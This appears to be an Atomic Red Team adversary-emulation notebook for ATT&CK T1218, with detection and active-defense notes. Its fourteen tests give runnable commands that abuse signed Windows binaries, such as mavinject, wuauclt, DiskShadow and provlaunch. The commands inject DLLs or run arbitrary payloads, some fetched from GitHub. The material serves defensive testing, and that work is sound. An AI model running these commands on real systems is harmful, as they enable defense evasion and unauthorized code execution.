# T1218 - System Binary Proxy Execution
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)

## Atomic Tests

### Atomic Test #1 - mavinject - Inject DLL into running process
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218\src\x64\T1218.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218\src\x64\T1218.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "PathToAtomicsFolder\T1218\src\x64\T1218.dll"

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
mavinject.exe 1000 /INJECTRUNNING "PathToAtomicsFolder\T1218\src\x64\T1218.dll"
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 1

### Atomic Test #2 - Register-CimProvider - Execute evil dll
Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll"

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\SysWow64\Register-CimProvider.exe -Path "PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll"
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 2

### Atomic Test #3 - InfDefaultInstall.exe .inf Execution
Test execution of a .inf using InfDefaultInstall.exe

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: INF file must exist on disk at specified location (#{inf_to_execute})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf"

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
InfDefaultInstall.exe "PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf"
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 3

### Atomic Test #4 - ProtocolHandler.exe Downloaded a Suspicious File
Emulates attack via documents through protocol handler in Microsoft Office.  On successful execution you should see Microsoft Word launch a blank file.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed

##### Check Prereq Commands:
```cmd
try {
  $wdApp = New-Object -COMObject "Word.Application"
  Stop-Process -Name "winword"
  exit 0 } catch { exit 1 }

```
##### Get Prereq Commands:
```cmd
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx"
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 4

### Atomic Test #5 - Microsoft.Workflow.Compiler.exe Payload Execution
Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: .Net must be installed for this test to work correctly.

##### Check Prereq Commands:
```powershell
if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\microsoft.workflow.compiler.exe ) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
write-host ".Net must be installed for this test to work correctly."

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\microsoft.workflow.compiler.exe "PathToAtomicsFolder\T1218\src\T1218.xml" output.txt
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 5

### Atomic Test #6 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions
Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: .Net must be installed for this test to work correctly.

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\svchost.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\microsoft.workflow.compiler.exe "PathToAtomicsFolder\..\ExternalPayloads\svchost.exe" -Force

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
&"PathToAtomicsFolder\..\ExternalPayloads\svchost.exe" "PathToAtomicsFolder\T1218\src\T1218.xml" output.txt
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 6

### Atomic Test #7 - Invoke-ATHRemoteFXvGPUDisablementCommand base test
RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.

Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.

The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.

Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath $PWD```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 7

### Atomic Test #8 - DiskShadow Command Execution
Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: txt file must exist on disk at specified location (#{txt_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1218\src\T1218.txt") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218\src\T1218.txt") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "PathToAtomicsFolder\T1218\src\T1218.txt"

```
##### Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
##### Check Prereq Commands:
```powershell
if (Test-Path C:\Windows\System32\diskshadow.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
echo "DiskShadow.exe not found on disk at expected location"

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
C:\Windows\System32\diskshadow.exe -S PathToAtomicsFolder\T1218\src\T1218.txt 
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 8

### Atomic Test #9 - Load Arbitrary DLL via Wuauclt (Windows Update Client)
This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. 
See https://dtm.uk/wuauclt/

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: DLL to load must exist on disk as specified location (#{arbitrary_dll})

##### Check Prereq Commands:
```cmd
if (test-path "PathToAtomicsFolder\T1218\bin\calc.dll"){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218\bin\calc.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "PathToAtomicsFolder\T1218\bin\calc.dll"

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
wuauclt.exe /UpdateDeploymentProvider "PathToAtomicsFolder\T1218\bin\calc.dll" /RunHandlerComServer
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 9

#### Cleanup: 
```cmd
taskkill /f /im calculator.exe > nul 2>&1```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Lolbin Gpscript logon optionExecutes logon scripts configured in Group Policy.
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
Gpscript /logon
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 10

### Atomic Test #11 - Lolbin Gpscript startup optionExecutes startup scripts configured in Group Policy
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
Gpscript /startup
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 11

### Atomic Test #12 - Lolbas ie4uinit.exe use as proxy
Executes commands from a specially prepared ie4uinit.inf file.
Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: ieuinit.inf must exist on disk at specified location (#{Path_inf})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218\src\ieuinit.inf") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218\src\ieuinit.inf") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "PathToAtomicsFolder\T1218\src\ieuinit.inf"

```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 12 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
copy c:\windows\system32\ie4uinit.exe %TEMP%\ie4uinit.exe
copy "PathToAtomicsFolder\T1218\src\ieuinit.inf" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 12

#### Cleanup: 
```cmd
del %TEMP%\ie4uinit.exe >nul 2>&1
del %TEMP%\ieuinit.inf >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 12 -Cleanup

### Atomic Test #13 - LOLBAS CustomShellHost to Spawn ProcessThis test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
Upon execution, customshellhost.exe will spawn calc.exe.
Note this will only work on Windows 10 or 11.
[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
if (-not (Test-Path C:\test)) {
New-Item -Path C:\test -ItemType Directory
} else {
Write-Host "Directory C:\test already exists." }
Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "C:\test\customshellhost.exe" -Force
Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "C:\test\explorer.exe" -Force
C:\test\customshellhost.exe
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 13

#### Cleanup: 
```powershell
Remove-Item -Path C:\test -Recurse -Force
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 13 -Cleanup

### Atomic Test #14 - Provlaunch.exe Executes Arbitrary Command via Registry KeyProvlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
- https://twitter.com/0gtweet/status/1674399582162153472
- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
Registry keys are deleted after successful execution.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin
```

In [ ]:
Invoke-AtomicTest T1218 -TestNumbers 14

## Detection
Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.


## Shield Active Defense
### Software Manipulation 
 Make changes to a system's software properties and functions to achieve a desired effect. 

 Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.
#### Opportunity
There is an opportunity to block an adversary's intended action and force them to reveal additional TTPs.
#### Use Case
A defender can monitor operating system functions calls to look for adversary use and/or abuse.

#### Procedures
Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.
Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.
Alter the output of an adversary's profiling commands to make newly-built systems look like the operating system was installed months earlier.
Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.
